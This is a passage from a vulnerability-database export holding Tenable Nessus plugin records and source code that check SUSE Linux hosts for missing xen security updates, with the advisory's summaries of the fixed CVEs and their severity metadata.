"p-cpe:/a:novell:suse_linux:xen-kmp-default", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1181-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109676", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1181-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109676);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7550\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES11 Security Update : xen (SUSE-SU-2018:1181-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1035442\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1072834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181181-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2531fbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-xen-13593=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-xen-13593=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-xen-13593=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"i386|i486|i586|i686|x86_64\") audit(AUDIT_ARCH_NOT, \"i386 / i486 / i586 / i686 / x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-kmp-default-4.4.4_30_3.0.101_108.38-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-libs-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-doc-html-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-tools-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"xen-kmp-pae-4.4.4_30_3.0.101_108.38-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"xen-kmp-default-4.4.4_30_3.0.101_108.38-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"xen-libs-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"xen-tools-domU-4.4.4_30-61.26.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"xen-kmp-pae-4.4.4_30_3.0.101_108.38-61.26.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:45:10", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-11T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:1202-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-kmp-default", "p-cpe:/a:novell:suse_linux:xen-kmp-default-debuginfo", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1202-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109721", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1202-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109721);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7550\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:1202-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181202-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?59b9d736\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2018-839=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-839=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-839=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-debugsource-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-kmp-default-4.5.5_24_k3.12.74_60.64.85-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-kmp-default-debuginfo-4.5.5_24_k3.12.74_60.64.85-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-libs-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-tools-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.5.5_24-22.46.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.5.5_24-22.46.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:45:03", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-10T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:1177-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-kmp-default", "p-cpe:/a:novell:suse_linux:xen-kmp-default-debuginfo", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1177-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109672", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1177-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109672);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7550\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:1177-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nThe update package also includes non-security fixes. See advisory 